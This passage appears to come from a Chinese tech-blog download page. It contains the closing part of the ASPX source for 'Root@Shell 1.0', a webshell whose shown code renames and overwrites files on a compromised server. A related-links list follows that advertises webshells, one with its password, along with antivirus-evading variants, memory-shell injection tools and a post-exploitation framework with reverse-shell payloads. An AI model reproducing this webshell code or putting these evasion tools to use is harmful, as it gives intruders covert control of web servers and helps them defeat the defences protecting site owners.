<form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  <center><p>You wish to rename <span class="style3"><%=request.QueryString("src")%></span> to: <%=getparentdir(request.QueryString("src"))%>
    <input type="text" name="name" class="TextBox"><br><br>
    <input type="submit" name="Submit3" value="Submit" class="button">
</p></center>
</form>
<script language="javascript">
function checkname()
{
if(formRn.name.value==""){alert("You shall input filename :(");return false}
}
</script>
  <%
  else
   if Rename() then
    response.Write("<script>alert('Rename " & replace(url,"/","//") & " to " & replace(Getparentdir(url) & request.Form("name"),"/","//") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
   else
    response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
   end if
  end if
 case "samename"
  url=request.QueryString("src")
%>
<form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
<p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="button">
<input name="Cancel" type="submit" id="Cancel" value="No" class="button">
</form>
   <p>
  <%
 case "logout"
     session.Abandon()
  response.Write("<center>Have a nice day...</center>")
  response.Write("<script>alert(' Goodbye !');location.href='rootshell.aspx" & request.ServerVariables("URL") & "';</sc" & "ript>")
 end select
end if
Catch error_x
 response.Write("<br/><center><font color=""red""></font></center>")
End Try
%>
</p>
<script language="javascript">
function closewindow()
{self.close();}
</script>
<b><p align="center" valign="bottom" class="footer">Root@Shell 1.0&nbsp;&bull;&nbsp;2006<br/>
By Silentz Of <a href="http://www.team-rootshell.com" target="_blank" title="Welcome to RootShell"> RootShell Security Team</a>&nbsp;&bull;&nbsp;ABS.lcirc.net #rootshell</p></b>
</body>
</html>

doyouloveme~
关注
jsp一句话木_图片木解析
weixin_39965881的博客
11-21 4490
PHP图片木 实现运行环境介绍本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为...
aspx原型
11-24
aspx原型,可以用来研究aspx的原理,方便学习网络安全知识,但请不要做坏事。
aspx大小
11-02
朋友的专业大,发出来大家使用,大家不要客气,踊跃下载,现在大的有用资料不多呢:)
.NET 一款反序列化注入天蝎内存的工具
最新发布
ahhacker86的专栏
08-16 598
Sharp4MemorySkyPayload 是一款专门设计用于通过.NET反序列化注入内存的工具。这款工具包含的负载通过利用.NET的反序列化机制,能够将一个内存注入到目标系统的内存中。使用该工具后,攻击者可以通过一个虚拟路径访问服务器,获取Shell路径和服务器的基本信息。
aspx大
02-02
aspx大
aspx脚本之cmd小命令
01-06
ASP.Net执行cmd命令的实现代码,需要的朋友可以参考下:using System; using System.Collections; using System.Configuration; using System.Data; using System.Linq; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.HtmlControls; using System.Web.UI.WebControl
针对aspx木可以读取iis站点信息,跨网站目录的临时解决方法
09-30
在网络安全领域中,aspx木是一种利用***应用的Web应用程序进行攻击的恶意代码。这种木特别危险,因为它可以跨站读取IIS(Internet Information Services)站点信息,并执行系统命令。为了防范这种攻击,可以采取...
aspx大,密码 gksec
04-14
aspx大,密码 gksec aspx大,密码 gksec
ASP.Net做的简易版文件管理器,就一个aspx文件
11-17
由于工作中的程序日志,是通过IIS自带的目录浏览功能来查看,不能进行一些处理,比如文件太多,页面显示太慢,想移动一些文件到旧的目录,或一些其它的文件管理操作,就做了一个简单的资源管理器,为了简单,代码和html全在一个文件里,什么压缩解压的功能也没加 注:把文件放到网站目录下即可运行,注意进入时要加一个QueryString来填写进入密码,初始密码为:beinet.cn 请自行修改代码里的密码配置 运行方式:FileManager.aspx?p=beinet.cn 比如你的网站是:http://www.beinet.cn/,你把这个文件放在根目录下,那么进入这个文件方式就是: http://www.beinet.cn/FileManager.aspx?p=beinet.cn 如果你发现有什么bug,请给我留言 或者你增加了什么新功能,希望给我发一个版本,一起进步,呵呵 2010.11.17更新日志: 1、版面修改; 2、增加目录或文件改名功能(使用js的prompt弹出窗口,所以IE8下可能会有提示) 3、增加目录批量删除 和 目录批量移动功能 4、增加目录大小获取功能 最后说明:以后如有更新,直接发布在 http://beinet.cn 谁让csdn不能更新呢
shell 免杀aspx_发个免杀修改的aspx提权qingshell.aspx
weixin_35795675的博客
01-30 609
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
Asp.net文件在线管理系统源码_aspx开发教程.7z
09-09
Asp.net文件在线管理系统源码_aspx开发教程.7z
aspX大(科技制造——)
03-20
经过被人多次进行改版其功能已经超出你所想象得了
As-Exploits:中国蚁剑后渗透框架
04-06
漏洞利用v 1.2 中国蚁剑后渗透框架 详细介绍:http: 支持类型:php / jsp / aspx 有效载荷部分很多很多了了跟的实现,向其开发者们表示感谢! 支持列表 模块名称\ Shell类型 PHP ASPX JSP 基本信息 √ √ √ 反弹壳 √ √ √ 内存 √ 内存管理 √ 杀软识别 √ √ √ 提权辅助 √ √ √ 屏幕截图 √ √ ShellCode加载器 √ 罐装器 √ 模块介绍 基本信息 获取当前服务端信息。 支持类型:php / jsp / aspx PHP jsp aspx 反弹壳 跟MSF联动 支持类型:php / jsp / aspx 有效负载目前支持以下类型: java / meterpreter / reverse_tcp java / shell / reverse_tcp java / meterpr
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
教你aspx免杀的小技巧
黑客攻防 | .net 源代码下载 | ASP.NET开发 | ORACLE数据库开发 | JAVASCRIPT脚本下载 | java源码下载
03-05 2089
导读:   今天黑站的时候,经常用的aspx怎么也上传不了,断定是被杀了。   BBS.bitsCN.com网管论坛   要提权就得用aspx,怎么办呢?网上找不到免杀的。无赖之下,只有找出中的特征码。   BBS.bitsCN.com网管论坛   尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟   Sub RunCMD(Src As Object, E As
文件上传 webshell 各类型 一句话木 图片 制作 教程
热门推荐
weixin_44286136的博客
06-05 1万+
webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 小:一句话木也称为小,即整个shell代码量只有一行,一般时系统执行函数 大:代码量和功能比小多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到 图片
aspx论坛页面原型发布 请大家多提意见!
weixin_30287169的博客
01-31 63
刚做好的一个aspx论坛页面原型 http://chenwusong.vicp.net/bbs/index.aspx附带有个关于修改鼠标右键的示例页面(在不同的区域显示不同的鼠标右键并响应事件 参考了aspnetmenu的做法)http://chenwusong.vicp.net/bbs/test/ierightkey/ierightkey2.aspx 转载于:https://www.cnblo...
.Net网站webshell 401?403?D盾拦截?一招内存直接搞定
qax
01-31 2107
在参加某次公司项目时,在碰到一个.NEt的通用系统,通过审计发现了两个文件上传漏洞,网站管理员发现网站被上传webshell后,最开始是修改了网站的配置文件,导致脚本文件禁止执行,后来通过上传web.config的方式给绕过了,但是后面管理员又给服务器装了D盾,安全狗,天擎,导致上传的文件无法正常解析,尝试了各种免杀的aspx,都是提示禁止执行脚本文件,最后通过加载内存的方式绕过了D盾的检测。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值